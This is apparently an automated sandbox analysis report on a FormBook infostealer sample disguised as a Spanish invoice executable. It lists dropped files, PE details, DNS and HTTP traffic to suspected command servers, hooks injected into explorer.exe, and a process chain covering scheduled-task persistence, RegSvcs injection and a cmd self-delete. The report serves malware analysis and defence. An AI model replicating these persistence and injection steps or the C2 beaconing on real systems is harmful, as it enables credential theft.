                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows
                                              C:\Users\user\AppData\Local\Temp\tmpD689.tmp
                                              Process:C:\Users\user\Desktop\Factura de proforma.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1646
                                              Entropy (8bit):5.186739433298605
                                              Encrypted:false
                                              SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBTGYtn:cbh47TlNQ//rydbz9I3YODOLNdq3X
                                              MD5:1E44E6ADAE1C0CA0FD56FA664DDFE899
                                              SHA1:BED45CA5BDDB3ED71E73A72C6058ED5101440C3F
                                              SHA-256:55CBE776A65A94D258CC0EA3911132969AED0F6979BE24A24BE4C4FB9F44E20A
                                              SHA-512:0F7E8D6686C0E5DE421C909904A5116A35E5A55FA3C61388C9665A4A81B145F3B0B0247CC3ED70F07014C2EB76F51EAC224F1F4E3CAB18FB5F0506BF49A42BCA
                                              Malicious:true
                                              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                              C:\Users\user\AppData\Roaming\tskpCbAwtxoaw.exe
                                              Process:C:\Users\user\Desktop\Factura de proforma.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):495616
                                              Entropy (8bit):7.503647477821442
                                              Encrypted:false
                                              SSDEEP:12288:x0K9jbtvzZPJukNeFrmndcPeGGUQSB/a:xh/plBlMFrleGfdB/
                                              MD5:16F7045EEBB451234CA8078222C5994C
                                              SHA1:99E8F263F9E34AD13CB8CD6AF1BB816DEFFB5BDE
                                              SHA-256:FF344E635B268090AAFDB8FA830E76C41F34D7CF9A9BF03ED4EDE2705008BFEF
                                              SHA-512:147D377F3F05F593E7428F5E5DD70C231E187C73DE1CDF111790156060F59047E80F382805678ECD3F946C58FCF5D80F4E16D8534F07F0F7355BEDEDB7726BB8
                                              Malicious:false
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z.fa..............0.................. ... ....@.. ....................................@.....................................O.... ............................................................................... ............... ..H............text... .... ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................H.......Lb..,O......Y...x...Pk...........................................0..V.........}......*.*s....}......}......}.....(.......(......{....r...po......{....r...po.....*...0.............(....&.{.........,....8....sA...%.{.....|....(....Z.{.....|....(....Z . &.s....} ...%.}......{ ...(.........(....o........+c...+C.....X.].......,+..(.......{....Z...{....Z.{.....{....o ........X.....|....(..........-....X.....|....(..........-......,...o!.....sB........|....(.....|....(....s"
                                              C:\Users\user\AppData\Roaming\tskpCbAwtxoaw.exe:Zone.Identifier
                                              Process:C:\Users\user\Desktop\Factura de proforma.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:false
                                              Preview: [ZoneTransfer]....ZoneId=0

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.503647477821442
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              File name:Factura de proforma.exe
                                              File size:495616
                                              MD5:16f7045eebb451234ca8078222c5994c
                                              SHA1:99e8f263f9e34ad13cb8cd6af1bb816deffb5bde
                                              SHA256:ff344e635b268090aafdb8fa830e76c41f34d7cf9a9bf03ed4ede2705008bfef
                                              SHA512:147d377f3f05f593e7428f5e5dd70c231e187c73de1cdf111790156060f59047e80f382805678ecd3f946c58fcf5d80f4e16d8534f07f0f7355bededb7726bb8
                                              SSDEEP:12288:x0K9jbtvzZPJukNeFrmndcPeGGUQSB/a:xh/plBlMFrleGfdB/
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z.fa..............0.................. ... ....@.. ....................................@................................

                                              File Icon

                                              Icon Hash:c4b28ed696aa92c0

                                              Static PE Info

                                              General

                                              Entrypoint:0x461d1a
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp:0x6166B25A [Wed Oct 13 10:18:02 2021 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:v4.0.30319
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x61cc80x4f.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x620000x18c84.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x7c0000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000x5fd200x5fe00False0.887357908246data7.7904887088IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rsrc0x620000x18c840x18e00False0.195302685302data5.06927966627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x7c0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_ICON0x621800x468GLS_BINARY_LSB_FIRST
                                              RT_ICON0x625f80x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
                                              RT_ICON0x636b00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                              RT_ICON0x65c680x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                              RT_ICON0x69ea00x10828dBase III DBT, version number 0, next free block index 40
                                              RT_GROUP_ICON0x7a6d80x4cdata
                                              RT_VERSION0x7a7340x350data
                                              RT_MANIFEST0x7aa940x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Version Infos

                                              DescriptionData
                                              Translation0x0000 0x04b0
                                              LegalCopyrightCopyright Gottschalks 2011
                                              Assembly Version1.0.0.0
                                              InternalNameCachedDa.exe
                                              FileVersion1.0.0.0
                                              CompanyNameGottschalks
                                              LegalTrademarks
                                              Comments
                                              ProductNameMapEditor1
                                              ProductVersion1.0.0.0
                                              FileDescriptionMapEditor1
                                              OriginalFilenameCachedDa.exe

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 13, 2021 20:36:07.331458092 CEST4980680192.168.2.313.209.99.177
                                              Oct 13, 2021 20:36:07.588181019 CEST804980613.209.99.177192.168.2.3
                                              Oct 13, 2021 20:36:07.588268042 CEST4980680192.168.2.313.209.99.177
                                              Oct 13, 2021 20:36:07.588450909 CEST4980680192.168.2.313.209.99.177
                                              Oct 13, 2021 20:36:07.845433950 CEST804980613.209.99.177192.168.2.3
                                              Oct 13, 2021 20:36:07.845493078 CEST804980613.209.99.177192.168.2.3
                                              Oct 13, 2021 20:36:07.845526934 CEST804980613.209.99.177192.168.2.3
                                              Oct 13, 2021 20:36:07.845746040 CEST4980680192.168.2.313.209.99.177
                                              Oct 13, 2021 20:36:07.845786095 CEST4980680192.168.2.313.209.99.177
                                              Oct 13, 2021 20:36:08.103004932 CEST804980613.209.99.177192.168.2.3

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 13, 2021 20:35:46.794310093 CEST5652753192.168.2.38.8.8.8
                                              Oct 13, 2021 20:35:46.817334890 CEST53565278.8.8.8192.168.2.3
                                              Oct 13, 2021 20:36:07.032196999 CEST5805853192.168.2.38.8.8.8
                                              Oct 13, 2021 20:36:07.327236891 CEST53580588.8.8.8192.168.2.3
                                              Oct 13, 2021 20:36:29.043936014 CEST5153953192.168.2.38.8.8.8
                                              Oct 13, 2021 20:36:29.067773104 CEST53515398.8.8.8192.168.2.3
                                              Oct 13, 2021 20:36:49.812874079 CEST5058553192.168.2.38.8.8.8
                                              Oct 13, 2021 20:36:49.838001966 CEST53505858.8.8.8192.168.2.3

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Oct 13, 2021 20:35:46.794310093 CEST192.168.2.38.8.8.80x6e9cStandard query (0)www.palmonlae.spaceA (IP address)IN (0x0001)
                                              Oct 13, 2021 20:36:07.032196999 CEST192.168.2.38.8.8.80xa477Standard query (0)www.aminobalm.comA (IP address)IN (0x0001)
                                              Oct 13, 2021 20:36:29.043936014 CEST192.168.2.38.8.8.80x9873Standard query (0)www.festival-du-chanvre.comA (IP address)IN (0x0001)
                                              Oct 13, 2021 20:36:49.812874079 CEST192.168.2.38.8.8.80x8184Standard query (0)www.new-post-vehicle-site.xyzA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Oct 13, 2021 20:35:46.817334890 CEST8.8.8.8192.168.2.30x6e9cName error (3)www.palmonlae.spacenonenoneA (IP address)IN (0x0001)
                                              Oct 13, 2021 20:36:07.327236891 CEST8.8.8.8192.168.2.30xa477No error (0)www.aminobalm.comparking3.dnstool.netCNAME (Canonical name)IN (0x0001)
                                              Oct 13, 2021 20:36:07.327236891 CEST8.8.8.8192.168.2.30xa477No error (0)parking3.dnstool.net13.209.99.177A (IP address)IN (0x0001)
                                              Oct 13, 2021 20:36:07.327236891 CEST8.8.8.8192.168.2.30xa477No error (0)parking3.dnstool.net3.35.27.175A (IP address)IN (0x0001)
                                              Oct 13, 2021 20:36:07.327236891 CEST8.8.8.8192.168.2.30xa477No error (0)parking3.dnstool.net13.125.234.146A (IP address)IN (0x0001)
                                              Oct 13, 2021 20:36:07.327236891 CEST8.8.8.8192.168.2.30xa477No error (0)parking3.dnstool.net13.228.77.229A (IP address)IN (0x0001)
                                              Oct 13, 2021 20:36:07.327236891 CEST8.8.8.8192.168.2.30xa477No error (0)parking3.dnstool.net13.230.138.127A (IP address)IN (0x0001)
                                              Oct 13, 2021 20:36:29.067773104 CEST8.8.8.8192.168.2.30x9873Name error (3)www.festival-du-chanvre.comnonenoneA (IP address)IN (0x0001)
                                              Oct 13, 2021 20:36:49.838001966 CEST8.8.8.8192.168.2.30x8184Name error (3)www.new-post-vehicle-site.xyznonenoneA (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • www.aminobalm.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.34980613.209.99.17780C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Oct 13, 2021 20:36:07.588450909 CEST5853OUTGET /cb3b/?c6=kr386M7znJup/B2j4KhdpwCgkxfUSLFq19BV4h8BDsMel0JC//DVwypubzBUvp11Q9BD&A0DXb=eZk4rh9h HTTP/1.1
                                              Host: www.aminobalm.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Oct 13, 2021 20:36:07.845493078 CEST5853INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx
                                              Date: Wed, 13 Oct 2021 18:36:07 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              Location: https://www.dotname.co.kr/customer/event/2019/20190604_landing_dotname?c6=kr386M7znJup/B2j4KhdpwCgkxfUSLFq19BV4h8BDsMel0JC//DVwypubzBUvp11Q9BD&A0DXb=eZk4rh9h
                                              X-Content-Type-Options: nosniff
                                              X-XSS-Protection: 1; mode=block
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function NameHook TypeActive in Processes
                                              PeekMessageAINLINEexplorer.exe
                                              PeekMessageWINLINEexplorer.exe
                                              GetMessageWINLINEexplorer.exe
                                              GetMessageAINLINEexplorer.exe

                                              Processes

                                              Process: explorer.exe, Module: user32.dll
                                              Function NameHook TypeNew Data
                                              PeekMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE0
                                              PeekMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE0
                                              GetMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE0
                                              GetMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE0

                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Start time:20:34:13
                                              Start date:13/10/2021
                                              Path:C:\Users\user\Desktop\Factura de proforma.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\Factura de proforma.exe'
                                              Imagebase:0x7a0000
                                              File size:495616 bytes
                                              MD5 hash:16F7045EEBB451234CA8078222C5994C
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmp, Author: Joe Security
                                              Reputation:low

                                              General

                                              Start time:20:34:24
                                              Start date:13/10/2021
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tskpCbAwtxoaw' /XML 'C:\Users\user\AppData\Local\Temp\tmpD689.tmp'
                                              Imagebase:0x1070000
                                              File size:185856 bytes
                                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:20:34:24
                                              Start date:13/10/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7f20f0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:20:34:25
                                              Start date:13/10/2021
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Imagebase:0xb80000
                                              File size:45152 bytes
                                              MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              General

                                              Start time:20:34:26
                                              Start date:13/10/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0x7ff720ea0000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              General

                                              Start time:20:35:00
                                              Start date:13/10/2021
                                              Path:C:\Windows\SysWOW64\cscript.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\cscript.exe
                                              Imagebase:0x260000
                                              File size:143360 bytes
                                              MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              General

                                              Start time:20:35:04
                                              Start date:13/10/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
                                              Imagebase:0xd80000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:20:35:05
                                              Start date:13/10/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7f20f0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis

                                              Reset < >